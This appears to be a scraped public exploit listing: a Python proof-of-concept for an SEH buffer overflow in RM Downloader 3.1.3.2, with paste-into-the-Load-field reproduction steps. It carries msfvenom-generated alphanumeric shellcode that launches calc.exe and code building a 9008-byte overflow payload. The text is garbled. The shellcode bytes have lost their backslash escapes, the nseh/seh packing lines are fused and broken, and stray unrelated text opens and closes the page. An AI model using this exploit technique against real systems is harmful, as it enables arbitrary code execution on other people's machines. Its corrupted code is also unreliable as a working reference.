RM Downloader 3.1.3.2.2010.06.13 Buffer Overflow ↭
https://www.ispeech.org/text.to.speech
# Date: 2020-04-20
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe
# Version: 3.1.3.2.2010.06.13
# Tested on: Windows 7 (x86)
# Proof of Concept:
# 1.- Run the python script, it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open 'RmDownloader.exe'
# 4.- Go to 'Load' tab
# 5.- Paste clipboard in 'Load' parameter
# 6.- Click on button 'OK'
# 7.- Two messageboxes regarding the length of the payload will pop up, click OK
# 8.- Profit
# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/
import struct
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 448 bytes
buf = b""
buf += b"x89xe3xdaxd0xd9x73xf4x5fx57x59x49x49x49"
buf += b"x49x49x49x49x49x49x49x43x43x43x43x43x43"
buf += b"x37x51x5ax6ax41x58x50x30x41x30x41x6bx41"
buf += b"x41x51x32x41x42x32x42x42x30x42x42x41x42"
buf += b"x58x50x38x41x42x75x4ax49x4bx4cx39x78x6b"
buf += b"x32x53x30x57x70x57x70x35x30x4dx59x4dx35"
buf += b"x46x51x79x50x72x44x4ex6bx56x30x76x50x4c"
buf += b"x4bx50x52x66x6cx4cx4bx66x32x72x34x4ex6b"
buf += b"x63x42x67x58x46x6fx4ex57x71x5ax47x56x35"
buf += b"x61x4bx4fx6cx6cx65x6cx51x71x61x6cx73x32"
buf += b"x66x4cx31x30x7ax61x6ax6fx54x4dx37x71x79"
buf += b"x57x4dx32x4cx32x36x32x62x77x6cx4bx76x32"
buf += b"x42x30x4ex6bx61x5ax45x6cx4cx4bx42x6cx32"
buf += b"x31x42x58x4dx33x32x68x47x71x6bx61x70x51"
buf += b"x6cx4bx61x49x47x50x33x31x4bx63x4ex6bx30"
buf += b"x49x67x68x49x73x35x6ax30x49x6cx4bx45x64"
buf += b"x4cx4bx35x51x69x46x45x61x4bx4fx4cx6cx4b"
buf += b"x71x68x4fx34x4dx66x61x69x57x34x78x59x70"
buf += b"x54x35x38x76x73x33x51x6dx39x68x35x6bx71"
buf += b"x6dx56x44x30x75x5ax44x76x38x4cx4bx72x78"
buf += b"x54x64x33x31x38x53x70x66x6ex6bx56x6cx70"
buf += b"x4bx4ex6bx50x58x75x4cx55x51x78x53x4ex6b"
buf += b"x56x64x6ex6bx73x31x6ex30x6ex69x37x34x56"
buf += b"x44x71x34x53x6bx33x6bx63x51x61x49x73x6a"
buf += b"x56x31x6bx4fx49x70x73x6fx31x4fx43x6ax4e"
buf += b"x6bx67x62x6ax4bx6ex6dx73x6dx32x4ax46x61"
buf += b"x6cx4dx4cx45x38x32x47x70x35x50x67x70x62"
buf += b"x70x53x58x54x71x4cx4bx52x4fx4bx37x49x6f"
buf += b"x38x55x6dx6bx49x70x65x4dx46x4ax75x5ax31"
buf += b"x78x79x36x7ax35x6fx4dx6dx4dx4bx4fx68x55"
buf += b"x65x6cx57x76x71x6cx47x7ax4fx70x49x6bx6b"
buf += b"x50x74x35x37x75x6dx6bx61x57x75x43x71x62"
buf += b"x72x4fx43x5ax65x50x66x33x6bx4fx6ax75x70"
buf += b"x63x55x31x72x4cx31x73x76x4ex72x45x43x48"
buf += b"x50x65x67x70x41x41"
nseh = struct.pack("seh = struct.pack("
buffer = "A" * 9008 + nseh + seh + "x41x49" * 10 + buf + "xff" * 200
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
Gloss